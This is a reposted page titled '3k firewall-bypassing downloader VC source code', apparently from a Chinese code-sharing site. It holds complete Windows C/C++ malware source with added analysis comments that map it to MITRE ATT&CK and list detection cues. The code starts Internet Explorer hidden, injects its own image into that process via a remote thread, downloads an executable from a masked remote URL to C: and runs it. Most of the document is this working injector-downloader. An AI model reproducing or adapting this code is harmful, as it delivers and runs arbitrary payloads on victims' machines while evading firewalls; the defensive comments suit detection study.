3k穿墙下载者VC源代码

    技术2022-05-19  39

    // Analysis notes (defensive reading of the listing below).
    //
    // What the code does, as written:
    //   1. main() starts Internet Explorer with a hidden window, looks up a
    //      top-level window of class "IEFrame" and opens the owning process
    //      with PROCESS_ALL_ACCESS.
    //   2. It copies its own in-memory image into that process at the same
    //      base address and starts a remote thread at download().
    //   3. download() fetches a file over HTTP to the root of C: and launches
    //      it, then ends the process it is running in.
    //
    // This is process injection (MITRE ATT&CK T1055) used to carry out a
    // download-and-execute step (T1105) from inside the browser process.
    // The "firewall-bypassing" in the page title presumably refers to the
    // request being issued by the browser process rather than by this
    // program - TODO confirm against the original post.
    //
    // Observable behaviour for detection:
    //   - iexplore.exe started hidden by a non-shell, non-browser parent;
    //   - a foreign process opening iexplore.exe with full access, then an
    //     executable read/write allocation, a cross-process write and a
    //     remote thread (process-access and remote-thread telemetry, e.g.
    //     Sysmon event IDs 10 and 8);
    //   - iexplore.exe writing an .exe to the root of the system drive and
    //     then starting it.

    #include <windows.h>
    #pragma comment(lib,"user32.lib")
    #pragma comment(lib,"kernel32.lib")
    // Uncomment the next lines and the compiled file is only 2K in size.
    //#pragma comment(linker, "/OPT:NOWIN98")
    //#pragma comment(linker, "/merge:.data=.text")
    //#pragma comment(linker, "/merge:.rdata=.text")
    //#pragma comment(linker, "/align:0x200")
    // The entry point is main() itself and the image is linked at a fixed
    // base address; main() later requests that same address in the target.
    #pragma comment(linker, "/ENTRY:main")
    #pragma comment(linker, "/subsystem:windows")
    #pragma comment(linker, "/BASE:0x13150000")

    // Function pointer filled in at run time with ShellExecuteA from shell32.dll.
    HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );
    // Function pointer filled in at run time with URLDownloadToFileA from urlmon.dll.
    DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);
    // Handle to the target process, opened in main().
    HANDLE processhandle;
    // Process id of the window found in main().
    DWORD pid;
    // Module handles for shell32.dll and urlmon.dll, loaded in download().
    HINSTANCE hshell,hurlmon;

    // Download routine used as the start address of the remote thread.
    // It takes no parameters; the thread argument passed by main() is unused.
    void download()
    {
        // Both APIs are resolved by name at run time, so they do not appear
        // in the import table; the name strings are still present in the image.
        hshell=LoadLibrary("Shell32.dll");
        hurlmon=LoadLibrary("urlmon.dll");
        (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
        (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
        // Fetch the remote file to a fixed path in the root of C: and open it.
        // The host name in the URL is already masked in the published listing.
        DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c://ieinst12.exe",0, NULL);
        // 5 is the numeric value of SW_SHOW.
        SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
        // Ends the process this routine runs in; when started as the remote
        // thread that is the process main() injected into.
        ExitProcess(0);
    };

    // Main function (also the linker entry point, see /ENTRY above).
    void main()
    {
        // 1. Build the Internet Explorer path and run it.
        char iename[MAX_PATH],iepath[MAX_PATH];
        ZeroMemory(iename,sizeof(iename));
        ZeroMemory(iepath,sizeof(iepath));
        GetWindowsDirectory(iepath,MAX_PATH);
        // Keep only the first three characters of the Windows directory
        // (the drive prefix); iename was zeroed, so it stays terminated.
        strncpy(iename,iepath,3);
        strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
        //strcat(iename,"windows//notepad.EXE");
        // Started with a hidden window, then a fixed half-second wait.
        WinExec(iename,SW_HIDE);
        Sleep(500);
        // 2. Get the IE process handle.
        // The lookup is by window class only, so it matches any "IEFrame"
        // window, not necessarily the instance started above.
        HWND htemp;
        htemp=FindWindow("IEFrame",NULL);
        GetWindowThreadProcessId(htemp,&pid);
        processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
        // 3. Allocate memory.
        HMODULE Module;
        LPVOID NewModule;
        DWORD Size;
        LPDWORD lpimagesize;
        // Base address of this process's own image.
        Module = GetModuleHandle(NULL);
        // Get the in-memory image size: read the DWORD at offset 0x3c of the
        // image (e_lfanew, the offset of the NT headers), then the DWORD at
        // NT headers + 0x50, which is SizeOfImage in a 32-bit PE header.
        _asm
        {
            push eax;
            push ebx;
            mov ebx,Module;
            mov eax,[ebx+0x3c];
            lea eax,[ebx+eax+0x50];
            mov eax,[eax]
            mov lpimagesize,eax;
            pop ebx;
            pop eax;
        };
        Size=(DWORD)lpimagesize;
        // Request, in the target process, the same address as this image's
        // base, committed with read/write/execute protection.
        NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        // 4. Write memory, create the thread.
        // Copies Size bytes of this process's image into the target.
        WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
        LPTHREAD_START_ROUTINE entrypoint;
        // Take the address of download() in this process; it is used
        // unchanged as the remote start address.
        __asm
        {
            push eax;
            lea eax,download;
            mov entrypoint,eax;
            pop eax
        }
        // Create the remote thread and run it, with Module as its argument.
        CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);
        // 5. Close the handle.
        CloseHandle(processhandle);
        return;
    }

